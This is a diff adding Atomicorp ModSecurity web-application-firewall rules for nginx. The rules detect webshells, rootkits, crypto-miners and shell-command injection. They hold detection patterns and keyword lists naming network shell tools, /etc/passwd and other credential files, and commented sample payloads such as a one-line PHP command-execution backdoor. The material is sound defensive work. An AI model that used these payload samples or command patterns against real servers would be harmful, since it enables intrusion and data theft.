+# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
+# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
+# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
+# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
+# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF
+# THE POSSIBILITY OF SUCH DAMAGE.
+#
+#---ASL-CONFIG-FILE---
+
+# Do not edit this file!
+# This file is generated and changes will be overwritten.
+#
+# If you need to make changes to the rules, please follow the procedure here:
+# http://www.atomicorp.com/wiki/index.php/Mod_security
+
+
+#Master list of known malware script file names
+#SecRule REQUEST_URI "(?:ogg|gopher|zlib|(?:ht|f)tps?)\:/" "capture,t:replaceNulls,t:htmlEntityDecode,t:urlDecodeUni,t:compressWhiteSpace,t:lowercase,id:390500,rev:1,severity:2,msg:'Atomicorp.com Malware Script Blacklist: Malware Script detected in URL',logdata:'%{TX.0}'"
+#SecRule REQUEST_URI "@pmFromFile malware_scripts.txt"
+
+#SecRule ARGS|REQUEST_FILENAME "@pmFromFile malware_scripts.txt" \ "capture,t:replaceNulls,t:htmlEntityDecode,t:urlDecodeUni,t:compressWhiteSpace,t:lowercase,id:390501,rev:1,severity:2,msg:'Atomicorp.com Malware Script Blacklist: Malware Script detected in ARGS',logdata:'%{TX.0}'"
+
+
+
+#Skip SPAM rules if this is a not something to check for spam, like control panels, ASL gui, etc.
+SecRule SERVER_PORT "@streq 30000" "phase:4,id:333852,pass,t:none,nolog,noauditlog,skipAfter:END_ROOTKIT_ALL"
+
+SecRule REQUEST_FILENAME "\.(?:flv|ico|avi|w(?:m(?:v|a)|ebp|bk)|mp(?:3|4|e?g)|cgm|s(?:vg|wf)|og(?:m|v|x)|xls|doc|od(?:t|s)|ppt)$" "phase:2,pass,t:none,t:lowercase,nolog,noauditlog,id:333853,skipAfter:END_ROOTKIT_FINAL"
+
+SecRule REQUEST_URI "^/(?:eprocservice/supplierinboundservice|\?_task=mail)" "phase:2,pass,t:none,t:lowercase,nolog,noauditlog,id:331853,skipAfter:END_ROOTKIT_FINAL"
+
+#possible crypto mining tools
+#mining.submit mining.subscribe mining.authorize
+#EthereumStratum|MinerName/1.0.0|cpuminer/2.5.1
+SecRule REQUEST_URI|ARGS "(?:mining\.(submit|authorized|subscribe)|ethereumstratum|minername/|cpuminer/|eth_submitlogin|ethereumstratum|xmrig/|xmr-stak-cpu)" "t:none,t:urlDecodeUni,t:lowercase,capture,id:391111,rev:2,severity:2,msg:'Atomicorp.com WAF Rules: Cryptomalware attack blocked',logdata:'%{TX.0}'"
+
+
+SecRule REQUEST_URI|ARGS|!ARGS:SAMLResponse "@pm http:// https:// gopher:// ogg:// zlib:// ftp:// ftps://" "id:333854,phase:2,t:none,t:urlDecodeUni,pass,nolog,noauditlog,skip:1"
+SecAction "phase:2,id:333760,t:none,pass,nolog,noauditlog,skipAfter:END_ROOTKIT_RFI"
+
+#SecRule REQUEST_URI|!ARGS:/redirect/|!ARGS:/referrer/|!ARGS:/url/|!ARGS:/img/|!ARGS:/^link/|!ARGS:loc|!ARGS:/referer/ "(?:ogg|gopher|zlib|(?:ht|f)tps?)\://(.+)\.(?:c|dat|kek|gif|jpe?g|jpeg|png|sh|txt|bmp|dat|txt|html?|tmp)\x20?\?" 	"t:none,t:urlDecodeUni,t:lowercase,t:replaceNulls,t:compressWhitespace,capture,chain,id:390144,rev:21,severity:2,msg:'Atomicorp.com WAF Rules: Command shell attack: Generic Attempt to remote include command shell',logdata:'%{TX.0}'"
+#SecRule REQUEST_URI "!(horde/services/go\.php|tiki-view_cache\.php|event\.ng/type=click|^/\?out=http://.*/.*\?ref=.*|^event\.ng/|^/hiphop2/=http|homeCounter\.php\?offerid=.*&ureferrer=http|/gltr_dontrunhttps?://|/plugins/wpeditimage/editimage\.html|/spc\.php)" 
+#
+#shell patterns
+SecRule REQUEST_URI "=(?:ogg|gopher|zlib|(?:ht|f)tps?)\:/(.+)\.(c|dat|kek|sh|te?xt|dat|tmp)\?" "deny,log,auditlog,status:404,t:none,t:urlDecodeUni,t:replaceNulls,t:lowercase,t:compressWhitespace,chain,id:390145,rev:11,severity:2,msg:'Atomicorp.com WAF Rules: Rootkit attack: Generic Attempt to install shell'"
+SecRule REQUEST_URI "!(?:/event\.ng/|horde/services/go\.php|tiki-view_cache\.php|^/\?out=http://|homecounter\.php\?offerid=.*ureferrer=http|__utm\.gif\?|/plugins/wpeditimage/editimage\.html|/spc\.php)" 
+
+SecRule ARGS "^(ht|f)tps?://([a-z0-9_\.?]+\.)?((rapidshare|mega(?:upload|shares?)|filefactory|mediafire|depositfiles|sendspace|badongo|uploading|savefile|cocshare|axifile|turboupload|gigasize|ziddu|uploadpalace|filefront|momupload|speedyshare|rnbload|adrive|easy-share|megarotic|egoshare)\.com|ifolder\.ru|files\.to|cocoshare\.cc|(?:usaupload|bitroad)\.net|netload\.in|rapidshare\.de)/.+" "deny,log,auditlog,status:404,t:none,t:urlDecodeUni,t:replaceNulls,t:lowercase,t:compressWhitespace,id:390902,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Possible Unauthorized Download Client'"
+#SecRule ARGS_POST "^http://(rapidshare|megaupload)\.com.+" "capture,id:390901,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Unauthorized Download Client - Rapidleech',logdata:'%{TX.0}'"
+SecMarker END_ROOTKIT_RFI
+
+#Jooma and wordpress PHP Shells
+#SecRule REQUEST_URI
+SecRule REQUEST_URI  "(?:/images/stories/|/components/com_smartformer/files/|/uploaded_files/user/|uploads/job-manager-uploads/).*\.php" "deny,log,auditlog,status:404,t:none,t:urlDecodeUni,t:lowercase,t:replaceNulls,t:compressWhitespace,capture,id:318812,rev:2,severity:2,msg:'Atomicorp.com WAF Rules: Possible Attempt to Access unauthorized shell or exploit in images directory',logdata:'%{TX.0}'"
+
+SecRule REQUEST_URI  "/(?:title|sourceinc|xml|general|info|dir|javascript|cache|menu|themes|functions|dump|inc)[0-9]+\.php" "deny,log,auditlog,status:404,t:none,t:urlDecodeUni,t:lowercase,t:replaceNulls,t:removewhitespace,capture,id:318814,rev:2,severity:2,msg:'Atomicorp.com WAF Rules: Possible Attempt to Access unauthorized shell or exploit',logdata:'%{TX.0}'"
+
+SecRule REQUEST_URI  "(?:cache\.uniq_[0-9]+|cache\.managed|/components/com_remository_files/*/*)\.php" "deny,log,auditlog,status:404,t:none,t:urlDecodeUni,t:lowercase,t:replaceNulls,t:compressWhitespace,capture,id:318912,rev:4,severity:2,msg:'Atomicorp.com WAF Rules: Possible Attempt to Access unauthorized shell or exploit in joomla modules directory',logdata:'%{TX.0}'"
+
+SecRule REQUEST_URI  "media/banner/.+\.php" "deny,log,auditlog,status:404,t:none,t:urlDecodeUni,t:lowercase,t:replaceNulls,t:compressWhitespace,capture,id:340153,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Possible Attempt to Access unauthorized shell or exploit in Kaboozu CMS banner directory',logdata:'%{TX.0}'"
+
+SecRule REQUEST_URI  "/wp-(?:settings|config)\.php" "chain,deny,log,auditlog,status:404,t:none,t:urlDecodeUni,t:lowercase,t:replaceNulls,t:compressWhitespace,capture,id:342153,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Attempt to inject code into wordpress',logdata:'%{TX.0}'"
+SecRule ARGS_NAMES "code(?:s|z)"
+
+SecRule REQUEST_URI  "forums?\.php" "chain,deny,log,auditlog,status:404,t:none,t:urlDecodeUni,t:lowercase,capture,id:342154,rev:2,severity:2,msg:'Atomicorp.com WAF Rules: Known vBulletin backdoor',logdata:'%{TX.0}'"
+SecRule ARGS:x "(?:shell|exec|passthru)"
+
+#Fake Major domains
+SecRule REQUEST_URI|ARGS  "(?:wordpress|img\.youtube|picasa|blogger|flickr)\.com\.[a-z0-9]+" "deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,capture,id:318813,rev:3,severity:2,msg:'Atomicorp.com WAF Rules: Possible Fake Domain name used in URL, Possible Injection Attack',logdata:'%{TX.0}'"
+
+SecRule REQUEST_URI|ARGS "@pm cmd inc= name= x_key x_file act= appfileexplorer thepath=" "id:333855,phase:2,t:none,t:urlDecodeUni,pass,nolog,noauditlog,skip:1"
+SecAction "phase:2,id:333761,t:none,pass,nolog,noauditlog,skipAfter:END_KNOWN_ROOTKITS"
+
+
+#known shell URLS
+SecRule REQUEST_URI|ARGS|!ARGS:/description/|!ARGS:/resolution/|!ARGS:/solution/|!ARGS:/message/|!ARGS:/text/|!ARGS:prefix|!ARGS:suffix  "(?:\.(?:dat|gif|jpg|png|bmp|txt|vir|dot)\?\&(?:cmd|inc|name|action)=|\.php\?act=?:(chmod&f|cmd|ls|f&f)|/cmd\?&(?:(?:ch|mk)dir=/|action=(?:ch|mk)dir))" "deny,log,auditlog,status:404,t:none,t:urlDecodeUni,t:lowercase,t:replaceNulls,t:compressWhitespace,capture,id:340033,rev:8,severity:2,msg:'Atomicorp.com WAF Rules: Possible attempt to run malware',logdata:'%{TX.0}'"
+
+#Body sigs
+SecRule REQUEST_HEADERS_NAMES "x_(?:key|file)\b" "capture,phase:2,t:none,t:lowercase,deny,log,auditlog,status:404,msg:'Atomicorp.com WAF Rules: Backdoor or shell access blocked',id:392146,severity:'2',logdata:'%{TX.0}'"
+
+#ASP sigs
+SecRule REQUEST_FILENAME "\.asp" "deny,log,auditlog,status:404,chain,t:none,t:urlDecodeUni,t:lowercase,capture,id:391150,rev:6,severity:2,msg:'Atomicorp.com WAF Rules: Rootkit attack: ASP shell attempt',logdata:'%{TX.0}'"
+SecRule REQUEST_URI   "(?:theact=inject&thepath=|pagename=appfileexplorer|showupload&thepath=|system32/cmd\.exe)"
+
+SecMarker END_KNOWN_ROOTKITS
+
+SecRule ARGS_NAMES "c99shcook" "deny,log,auditlog,status:404,id:391158,phase:2,capture,t:none,t:lowercase,severity:1,rev:1,msg:'Atomicorp.com WAF Rules: PHP c99 webshell',logdata:'%{TX.0}'"
+
+#Check body of responses for known or suspected malicious web applications
+SecRule REQUEST_METHOD "^REPORT$" "phase:4,rev:2,id:334785,pass,t:none,nolog,noauditlog,skipAfter:END_ROOTKIT_BODY"
+
+SecRule REQUEST_URI "/wp-admin/plugin-install\.php\?tab=plugin-information&plugin=wordfence" "phase:4,rev:2,id:364785,pass,t:none,nolog,noauditlog,skipAfter:END_ROOTKIT_BODY"
+
+
+SecRule RESPONSE_BODY "@pm boff rapidleech mailer telnet shell hacke sh3ll SecurityCrewz phpftp explorer aventis xerror injection rhtools commander terminal ntdaddy fux0r www.sanalteror.org haxplor konsole c99 zfxid1.txt c100 r57 aventgrup exploit safe_mode open_basedir feecomz shirohigomz pshyco safemode safe-mode sh-inf: sh-err: emailbases prioritet leech uname leech ehennemdea obzerve feelcomz shirohigeshirohige lusif3r_666 sience emp3ror undetectable hack pshyco owned backdoor jaheem networkfilemanagerphp bots suid sguid service.pwd .bash_history .fetchmailrc #mhpver vulner4bl3 /etc/passwd mode: alucar rst/ghc netsploit bruteforce M4st3r Indishell GIF89 Upl04d3r uploader FilesMan JPEG-1.1<base64_encoded bypass 3xp1r3 Cracker Symlink Symlink hijack connected backdoor woman-five companies-best-man million-support" "id:333856,rev:2,phase:4,t:none,pass,nolog,noauditlog,skip:1"
+SecAction "phase:4,id:333762,t:none,pass,nolog,noauditlog,skipAfter:END_ROOTKIT_BODY"
+
+#Moved from embargoed rules
+SecRule RESPONSE_BODY "(?:<title>Woman-Five-How-To-Why-Your-Celebrating-Learn-Brand</title>|<p>Companies-Best-Man-Vendors-Best</p>|<p>Million-Support-Years-Week-Agents</p>)" "phase:4,t:none,ctl:auditLogParts=+F,auditlog,deny,log,status:404,msg:'Atomicorp.com WAF Rules: Possible cloaked Solarwinds malware on system',id:'340004',rev:1,severity:'2'"
+
+#Fake GIF89
+SecRule RESPONSE_BODY "^GIF89" "phase:4,t:none,ctl:auditLogParts=+F,auditlog,deny,log,status:404,msg:'Atomicorp.com WAF Rules: Possible cloaked malware on system',id:'393150',rev:5,severity:'2',chain"
+SecRule REQUEST_FILENAME "!@endswith .gif" "t:none,t:lowercase"
+
+SecRule RESPONSE_BODY "^JPEG-1.1<base64_encoded" "phase:4,t:none,ctl:auditLogParts=+F,auditlog,deny,log,status:404,msg:'Atomicorp.com WAF Rules: Possible cloaked malware on system',id:'393151',rev:5,severity:'2'"
+
+SecRule RESPONSE_BODY "Connected to root:" "phase:4,t:none,ctl:auditLogParts=+F,auditlog,deny,log,status:404,msg:'Atomicorp.com WAF Rules: Possible web shell blocked on system',id:'393152',rev:5,severity:'1'"
+
+#Request Body patterns that are not malicious
+SecRule RESPONSE_BODY  "<title>(?:.{0,64}Web[m|M]ail|Horde \:\:)" "phase:4,rev:2,id:333785,pass,t:none,nolog,noauditlog,skipAfter:END_ROOTKIT_BODY"
+
+SecRule RESPONSE_BODY "(?:add (?:new emailbases to database|high prioritet emails)|<title>dark-mailer v|xerror was here|title>\:\: mailer inbox \:\:)" "phase:4,t:none,ctl:auditLogParts=+E,auditlog,status:404,msg:'Atomicorp.com WAF Rules: Possible spamtool installed on system',id:'390150',rev:5,severity:'2'"
+
+#Rapid Leech blocks
+SecRule RESPONSE_BODY "(?:rapidleech plugmod -|you are not allowed to leech from|=\"http://www\.rapidleech\.com)" "deny,log,phase:4,t:none,ctl:auditLogParts=+E,auditlog,status:404,msg:'Atomicorp.com WAF Rules: Possible Unauthorized Download Client - Rapidleech',id:'390900',rev:12,severity:'2'"
+
+SecRule REQUEST_URI "^/wp-admin/admin\.php\?page=WordfenceOptions$" "id:321117,rev:1,phase:4,t:none,pass,nolog,noauditlog,skipAfter:SKIP_AFTER_RULE_390149"
+
+#trick them with a 40
+SecRule RESPONSE_BODY  "(?:(?:ne(?:ws remote php shell injection|tworkfilemanagerphp|tsploit)|c(?:(?:99 ?(?:mad)?|100 ?) ?(web)shell|ehennemden|gi-?telnet)|php(?: ?(?:commander|shell)|-?terminal| backdoor|ftp)|SvT SheLL|WSO 2.4|WebRooT Hack Tools|\b(?:r(?:emote explorer|57 ?sh(?:e|3)ll)|(?:alucar|saudi) sh(?:3|e)ll)\b|inbox mass mailer by hack|r(?:57 ?shell|htools)|(?:konsole |stun ?)shell|\.sanalteror\.org|haxplorer|gamma ?web|fux0r inc| - n3t)|[Ss](?:h(?:ell by (?:rst/ghc|alucar)|irohigeshirohige|-(?:err|inf): )|afe(?:(?:-| )?mode(?: bypass|execdir| ?\[ ?[Ss]afe(?:-| )?mode\:)|-mode bypass|modeexecdir)|tunshell)|f(?:ind (?:.(?:bash_history|fetchmailrc)|[gs]uid|all) files|eelcomz)|(?:e(?:mp3ror undetectabl|xecution php-cod))e|b(?:(?:\.o\.v sience 2|off 1\.)0|y pshyco, © 2008 error|indshell)|php ?(?:4|5).{1,200}? safe_mode ?(\&|/|and)? ?open_basedir ?bypass|t(?:his is an? exploit from|otal bots active)|design by (?:rst/ghc|alucar)|l(?:ocus7shell|usif3r_666)|(?:o|0)wned by (?:hacker|#)|jaheem galaxy 2|reverseshell|\#mhpver|\[Exploit-DB|syrian-shell.com|SyRiAn Sh3ll|Sh(?:3|e)ll Uploader|W3lc0m3 M4st3r|Indishell|Safe ?(?:-| )?mode ?\: ?OFF|Upl04d3r|FilesMan|>Hacked by <|(?:Da3s|Da3s HaCkEr) File Manager|Symlink Bypass|3xp1r3|Finder/Cracke|Symlink</title>|Index Hijack|Smoker Backdoor)" "deny,log,capture,phase:4,t:none,ctl:auditLogParts=+E,auditlog,status:404,msg:'Atomicorp.com WAF Rules: Possible remote shell or bot access denied',id:'390149',rev:59,severity:'2',logdata:'%{TX.0}'"
+
+SecMarker SKIP_AFTER_RULE_390149
+
+#This protects the victims, by preventing compromised files from being loaded
+SecRule RESPONSE_BODY  "(?:SecurityCrewz|Exploit-DB)" "deny,log,capture,phase:4,t:none,ctl:auditLogParts=+E,auditlog,status:404,msg:'Atomicorp.com WAF Rules: Possible compromised website detected and 404 sent to user',id:'392149',rev:1,severity:'2',logdata:'%{TX.0}',tag:'no_ar'"
+
+SecMarker END_ROOTKIT_BODY
+
+
+SecRule REQUEST_URI|ARGS|!ARGS:SAMLResponse "@pm echo system passthru exec error_reporting stripshashes _request get_magic_quotes_gpc @@rndstr@@ netenberg psybnc fantastico_de_luxe arta.zip information_schema.tables char( php_uname eval decode_base64 base64_decode gzuncompress base64_url_decode" "id:333857,phase:2,t:none,t:urlDecodeUni,pass,nolog,noauditlog,skip:1"
+SecAction "phase:2,id:333763,t:none,pass,nolog,noauditlog,skipAfter:END_ROOTKIT_BODY_2"
+#generic payload
+#if (isset($_GET['cmd']))          passthru(stripslashes($_GET['cmd']));
+#
+SecRule REQUEST_URI|ARGS|!ARGS:code|!ARGS:/description/|!ARGS:/^layout/|!ARGS:message|!ARGS:email|!ARGS:description|!ARGS:body|!ARGS:/text/|!ARGS:/txt/ "(?:<\? ?php (?:echo ?\"hi ?master|(?:system|passthru|shell_exec|exec) ?(?:\(|@|\: ?'?))|(?:stripslashes|passthru) ?\( ?\$_request\[\"|if \( ?get_magic_quotes_gpc\(|php_uname|eval ?\( ?(?:base64_decode|base64_url_decode|decode_base64|gzuncompress) ?\()" "deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:lowercase,t:compressWhitespace,chain,capture,id:390801,rev:5,severity:2,msg:'Atomicorp.com WAF Rules: Possible Shellkit attack: Generic Attempt to insert shell code',logdata:'%{TX.0}'"
+SecRule REQUEST_URI "!(wp-login\.php\?vaultpress=true&action=exec&doing_wp_cron&)"
+
+#some broken attack program
+SecRule REQUEST_URI|ARGS|REQUEST_BODY "(?:_@@rndstr@@|netenberg |psybnc |fantastico_de_luxe |arta\.zip )" "deny,log,auditlog,status:403,capture,t:none,t:urlDecodeUni,t:lowercase,id:390803,rev:2,severity:2,msg:'Atomicorp.com WAF Rules: Known Wormsign',logdata:'%{TX.0}'"
+
+#New SEL attack seen
+#SecRule REQUEST_URI|ARGS|REQUEST_BODY "(?:select.*from.*information_schema\.tables|and.+char\(.*\).+user\schar\()" #"capture,t:none,t:urlDecodeUni,t:lowercase,id:390804,rev:2,severity:2,msg:'Atomicorp.com WAF Rules: Known shell SQL payload',logdata:'%{TX.0}'"
+
+SecMarker END_ROOTKIT_BODY_2
+
+SecRule REQUEST_URI|ARGS|REQUEST_BODY "@pm echo system passthru shell_exec exec error_reporting stripshashes _request get_magic_quotes_gpc php_uname eval" "phase:2,id:333786,t:none,pass,nolog,noauditlog,skip:1"
+SecAction "phase:2,id:333764,t:none,pass,nolog,noauditlog,skipAfter:END_ROOTKIT_BODY_3"
+
+SecRule REQUEST_URI "!(?:^/wp-login\.php\?vaultpress=true&action=exec&doing_wp_cron&wp-admin)" "deny,log,auditlog,status:403,chain,capture,t:none,t:lowercase,t:compressWhitespace,id:390810,rev:3,severity:2,msg:'Atomicorp.com WAF Rules: Possible Rootkit attack: Generic Attempt to insert shell code',logdata:'%{TX.0}'"
+SecRule REQUEST_URI|ARGS|REQUEST_BODY|!ARGS:description|!ARGS:message|!ARGS:problem|!ARGS:solution   "(?:<\? ?php (echo ?\"hi ?master|(system|passthru|shell_exec|exec) ?(?:\(|@|\: ?'?))|(?:system|passthru|shell_exec|exec) ?\(|(?:stripslashes|passthru) ?\( ?\$_request\[\"|if \( ?get_magic_quotes_gpc\(|php_uname|eval ?\( ?(?:base64_decode|base64_url_decode|decode_base64|gzuncompress) ?\()" 
+
+SecMarker END_ROOTKIT_BODY_3
+
+SecRule REQUEST_URI|ARGS|REQUEST_BODY "@pm echo system passthru exec error_reporting stripshashes _request get_magic_quotes_gpc php_uname eval" "id:333859,phase:2,t:none,pass,nolog,noauditlog,skip:1"
+SecAction "phase:2,id:333765,t:none,pass,nolog,noauditlog,skipAfter:END_ROOTKIT_BODY_4"
+
+SecRule REQUEST_URI "!(?:^/wp-login\.php\?vaultpress=true&action=exec&doing_wp_cron&wp-admin)" "deny,log,auditlog,status:403,chain,capture,t:none,t:lowercase,t:compressWhitespace,id:390811,rev:2,severity:2,msg:'Atomicorp.com WAF Rules: Possible attack: Generic Attempt to insert shell code',logdata:'%{TX.0}'"
+SecRule REQUEST_URI|ARGS|REQUEST_BODY|!ARGS:code   "(?:<\? ?php (echo ?\"hi ?master|(?:system|passthru|shell_exec|exec) ?\()|(?:passthru|shell_exec|exec) ?\(|(?:stripslashes|passthru) ?\( ?\$_request\[\"|if \( ?get_magic_quotes_gpc\(|php_uname|eval ?\( ?(?:base64_decode|base64_url_decode|decode_base64|gzuncompress) ?\()" 
+
+SecMarker END_ROOTKIT_BODY_4
+
+#SecRule MODSEC_BUILD "!@ge 020513900" "t:none,pass,nolog,noauditlog,skipAfter:END_ROOTKIT_BODY_5
+#SecRule REQUEST_URI|ARGS|REQUEST_BODY "@pm echo system passthru shell_exec exec error_reporting stripshashes _request get_magic_quotes_gpc php_uname eval"       "phase:2,t:none,t:decodeBase64Ext,pass,nolog,noauditlog,skip:1"
+#SecAction phase:2,t:none,pass,nolog,noauditlog,skipAfter:END_ROOTKIT_BODY_5
+#
+#SecRule REQUEST_URI|ARGS|REQUEST_BODY   "(?:<\? ?php (echo ?\"hi ?master|.*(system|passthru|shell_exec|exec) ?\()|error_reporting\(.*\) ?\; ?if ?\(isset ?\(.*\) ?\) (system|passthru|shell_exec|exec) ?\(|(stripslashes|passthru) ?\( ?\$_request\[\"|if \( ?get_magic_quotes_gpc\(|php_uname|eval ?\( ?(?:base64_decode|gzuncompress) ?\()" "capture,t:none,t:decodeBase64Ext,t:lowercase,t:compressWhitespace,id:390811,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Possible Rootkit attack: Generic Attempt to insert shell code',logdata:'%{TX.0}'"
+#SecMarker END_ROOTKIT_BODY_5
+
+SecRule REQUEST_URI "@pm perl xkernel kaiten mampus trojan r57 c99 zfxid1.txt c100 fuckthepolice.php test.php 404.php.jpg webadmin.php.flv dump footer.php press60.php gallery.php" "id:333860,phase:2,t:none,t:urlDecodeUni,pass,nolog,noauditlog,skip:1"
+SecAction "phase:2,id:333766,t:none,pass,nolog,noauditlog,skipAfter:END_PERL_EXEC"
+#Generic remote perl execution with .pl extension
+SecRule REQUEST_URI "(?:perl .*\.pl(\s|\t)*\;|\;(\s|\t)*perl .*\.pl|perl (?:xpl\.pl|kut|viewde|httpd\.txt)|\./xkernel\;|/kaiten\.c|/mampus\?&(?:cmd|command)|trojan\.htm|/(?:r57|c99|c100)\.(?:php|txt)|r57shell\.(?:php|txt)|fuckthepolice\.php|404\.php\.jpg|webadmin\.php\.flv|zfxid1\.txt|(?:royalslider/languages/test|/js/imgareaselect/footer|/cgi-bin/whm/press60|wp-content/themes/avada/fonts/gallery)\.php)" "capture,status:500,deny,log,auditlog,t:none,t:urlDecodeUni,t:cmdline,multimatch,id:390802,rev:8,severity:2,msg:'Atomicorp.com WAF Rules: Possible Rootkit attack: Known Rootkit',logdata:'%{TX.0}'"
+SecMarker END_PERL_EXEC
+
+SecRule RESPONSE_HEADERS:WWW-Authenticate "rapidleech" "deny,log,capture,t:none,t:lowercase,phase:3,ctl:auditLogParts=+E,auditlog,status:404,msg:'Atomicorp.com WAF Rules: Unauthorized Download Client - Rapidleech',id:'390903',rev:1,severity:'2',logdata:'%{TX.0}'"
+
+SecRule ARGS|REQUEST_URI "@pm ls find mysqldump ifconfig php echo perl killall kill python rpm yum apt-get emerge lynx links mkdir elinks wget ftpget lwp- uname cvs svn scp rcp ssh rsh netstat cat rexec smclient tftp ncftp curl telnet gcc cpp g++ /sbin/ /bin/ /tmp /var fetch rm print mv unzip tar rm rar" "id:333861,phase:2,t:none,t:urlDecodeUni,t:cmdline,pass,nolog,noauditlog,skip:1"
+SecAction "phase:2,id:333767,rev:3,t:none,pass,nolog,noauditlog,skipAfter:END_KNOWN_SIGNS"
+
+#Known shells
+SecRule ARGS:cmd|ARGS:act|ARGS:command|ARGS:action "\b(?:ls\b(?: -|\&)|find /|mysqldump |ifconfig |chdir=|php |echo |perl |killall |kill -|python |rpm |yum |apt-get |emerge |lynx |links\b |mkdir |elinks |(?:ftp|w)get |lwp-(?:download|request|mirror|rget) |uname |cvs |svn |(?:s|r)(?:cp|sh) |net(?:stat|cat) |rexec |smbclient |t?ftp |ncftp |curl |telnet |gcc -?[a-z0-9]+ |\bcpp\b |g\+\+ |/s?bin/(?:xterm|id|bash|sh|echo|chmod|ch?sh|python|perl|nasm|ping|mail|ssh|netstat|php|route)\b|\bmv\b |unzip |tar |\brm\b |\bcat\b (?:/|\.\.)|\brar\b )" "chain,deny,log,auditlog,status:403,capture,t:none,t:urlDecodeUni,t:cmdline,multimatch,id:390904,rev:15,severity:2,msg:'Atomicorp.com WAF Rules: Possible Shell Command Attempt',logdata:'%{TX.0}'"
+SecRule REQUEST_URI "!(^/components/com_clm/clm/)"
+
+#for direct CGI type commands
+#http://example.com/cmd.cgi?cat /etc/passwd
+#SecRule REQUEST_URI  "\b(?:ls\b -|find /|mysqldump |php |echo |perl |killall |kill |python |lynx |e?links (?:[0-9]|h|f) |mkdir |wget |lwp-(?:download|request|mirror|rget) |uname |cvs |svn |(?:s|r)(?:cp|sh) |net(?:stat|cat) |rexec |smbclient |t?ftp |ncftp |curl |telnet |g?cc -?[a-z0-9]+ |\bcpp\b |g\+\+ |/s?bin/(?:xterm|id|bash|sh|echo|kill|chmod|ch?sh|python|perl|nasm|ping|mail|ssh|netstat|php|route)\b|mv\b |unzip |tar\b |rm\b |cat (?:/|\.\.)|rar\b )" "capture,t:none,t:urlDecodeUni,t:compresswhitespace,multimatch,id:390907,rev:9,severity:2,msg:'Atomicorp.com WAF Rules: Possible Shell Command Attempt',logdata:'%{TX.0}'"
+
+SecRule ARGS:ev "^print [0-9]+ ?;" "deny,log,auditlog,status:403,capture,id:390905,rev:1,t:none,t:lowercase,severity:2,msg:'Atomicorp.com WAF Rules: Possible PHP Shell Command Attempt',logdata:'%{TX.0}'"
+
+#new known injected payload
+#SecRule ARGS "(?:cd /(?:tmp|var/tmp) ?; ?(?:lwp-download|wget|curl|elinks|fetch|rm -[r|f][r|f])|killall -9 perl ?; ? rm -[r|f][r|f])" "capture,t:none,t:urlDecodeUni,t:cmdline,id:390906,rev:3,severity:2,msg:'Atomicorp.com WAF Rules: Possible Shell Command Attempt',logdata:'%{TX.0}'"
+
+SecMarker END_KNOWN_SIGNS
+
+#Uploaded php files in the WP cache directories
+SecRule REQUEST_FILENAME "/wp-content/(?:themes/.+/cache|uploads/(?:[0-9]+/[0-9]+|tmp)|plugins/revslider/temp/update_extract/resume|plugins/wp-mobile-detector/cache)/.+\.ph(?:p[345]|tml|t)$" "log,deny,log,status:404,auditlog,t:none,t:urlDecodeUni,t:lowercase,t:compressWhiteSpace,capture,id:318811,rev:5,severity:2,msg:'Atomicorp.com WAF Rules: Possible Attempt to Access unauthorized shell or exploit in WP cache directory',logdata:'%{TX.0}',chain"
+SecRule REQUEST_FILENAME "!(/cache/timthumb\.php$)"
+
+#/modules/simpletest/files/
+#/files/stats38.php
+SecRule REQUEST_FILENAME "/file(?:s/.*\.php[0-9]+?$|manager/userfiles/.*\.ph(?:p|tml|t))"  "log,deny,status:404,auditlog,t:none,t:urlDecodeUni,t:lowercase,t:compressWhiteSpace,capture,id:316812,rev:2,severity:2,msg:'Atomicorp.com WAF Rules: Possible Attempt to Access unauthorized shell or exploit in upload directory',logdata:'%{TX.0}'"
+
+SecMarker END_ROOTKIT_FINAL
+
+
+SecMarker END_ROOTKIT_ALL
diff --git a/nginx-waf/51_asl_paranoid_extra.conf b/nginx-waf/51_asl_paranoid_extra.conf
new file mode 100644
index 0000000..021f3df
--- /dev/null
+++ b/nginx-waf/51_asl_paranoid_extra.conf
@@ -0,0 +1,38 @@
+SecDefaultAction "log,deny,auditlog,phase:2,status:403"
+# http://www.atomicorp.com/
+# Atomicorp (Gotroot.com) ModSecurity rules
+# Application Security Rules for modsec 2.x
+#
+# Copyright 2005-2023 by Atomicorp, Inc. all rights reserved.
+# Redistribution is strictly prohibited in any form, including whole or in part.
+#
+# Distribution of this work or derivative of this work in any form is
+# prohibited unless prior written permission is obtained from the
+# copyright holder.
+#
+# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS AS IS
+# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
+# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE
+# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
+# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
+# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
+# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
+# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
+# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF
+# THE POSSIBILITY OF SUCH DAMAGE.
+#
+#---ASL-CONFIG-FILE---
+#
+
+# Do not edit this file!
+# This file is generated and changes will be overwritten.
+#
+# If you need to make changes to the rules, please follow the procedure here:
+# http://www.atomicorp.com/wiki/index.php/Mod_security
